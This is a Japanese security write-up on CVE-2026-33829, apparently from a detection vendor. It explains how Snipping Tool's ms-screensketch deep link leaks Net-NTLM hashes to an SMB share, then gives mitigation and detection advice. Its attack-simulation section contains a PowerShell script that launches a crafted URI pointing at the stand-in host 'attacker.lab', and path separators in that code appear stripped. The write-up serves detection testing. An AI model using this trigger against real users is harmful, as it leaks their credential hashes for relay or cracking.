CVE-2026-33829: Snipping Tool NTLMリーク
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
WindowsのSnipping Toolにおける脆弱性が、現在ログインしているユーザーのNet-NTLMハッシュをリモート攻撃者に漏洩させる可能性があります。この問題は、 ms-screensketch URIスキームを悪用した悪意のあるディープリンクを介してトリガーされ、Snipping Toolが攻撃者が制御するSMB共有にホストされたファイルを開くことになります。被害者が作成されたリンクをクリックまたは開く必要がありますが、SMB接続の際にWindowsがバックグラウンドで認証情報を漏洩させるため、ユーザーには明示的な警告が表示されません。この振舞いにより、攻撃者はNTLM認証レスポンスデータにアクセスできるようになります。
調査
研究者たちは、この ms-screensketch プロトコルが filePath パラメータを受け入れ、任意のUNCパスを適切に制限していないことを発見しました。Snipping Toolがそのようなパスにアクセスしようとすると、Windowsは自動的にリモートSMBサーバーに認証を試み、プロセスでNTLMレスポンスを漏洩させます。この問題を立証するために、研究者たちはSMBリスナーを起動し、漏洩したハッシュをキャプチャする能力のある悪意のあるURIを生成しました。
緩和策
Microsoftは、2026年4月14日に、Snipping Toolから脆弱なディープリンクの挙動を削除したセキュリティアップデートをリリースしました。このパッチを適用することにより、信頼できないURIを通じて攻撃者が供給するSMBパスを自動的に開くことが防止されます。影響を受けているWindowsシステム全体でアップデートの展開を優先することで、露出をなくすことができます。
対応
防御者は、 ms-screensketch URIスキームを呼び出そうとする試みを監視し、通常ではない内部または外部ホストへのアウトバウンドSMB接続を警戒するべきです。Snipping Toolが不要なシステムには、可能であればプロトコルを制限し、パッチの展開を遅延なく強制する必要があります。露出したNTLMハッシュは、リプレイ、リレー、またはその他のフォローオンアビューズの兆候を確認するため、迅速に調査されるべきです。
攻撃フロー
シミュレーション実行
前提条件: テレメトリー&ベースラインのプレフライトチェックが合格していること。
理由: このセクションでは、検出ルールを引き起こすために設計された敵対者の技術(TTP)の正確な実行を詳細に説明します。コマンドと記述は、特定されたTTPを直接反映し、検出ロジックが期待する正確なテレメトリーを生成することを目的としています。
-
攻撃シナリオとコマンド:
攻撃者は被害者のワークステーションで足掛かりを得て、NTLMハッシュを疑いを持たせずに収集したいと考えています。攻撃者はCVE-2026-33829を活用し、
ms-screensketch:攻撃者が制御するSMB共有を指すURIを作成します(attacker.labsharepayload.png)。Snipping ToolがこのURIを処理すると、Windowsは自動的にリモートサーバーに対してSMB接続を開始し、マシンのNTLMレスポンスを漏洩します。攻撃者はPowerShellを使用してURIを実行し、Snipping Toolがユーザーコンテキストで起動することを確実にします。 -
回帰テストスクリプト:
# Snipping Tool経由のNTLM漏洩 – トリガースクリプト # UNCパスを制御したリスナーに合わせて調整します。 $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "悪意のあるURIでSnipping Toolを起動しています..." Start-Process $uri # SMBハンドシェイクが完了するまで数秒待機 Start-Sleep -Seconds 5 Write-Host "起動完了。SIEMで EventID 3 が '$attackerServer' を含む DestinationHostname をチェックしてください。" -
クリーンアップコマンド:
# 残留Snipping Toolプロセスがまだ実行中の場合は削除 Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # 任意: 攻撃者側で生成された一時ファイルを削除(存在する場合) # (共有への書き込み権限があることを前提とします) # Remove-Item -Path "$attackerServer$sharePath" -Force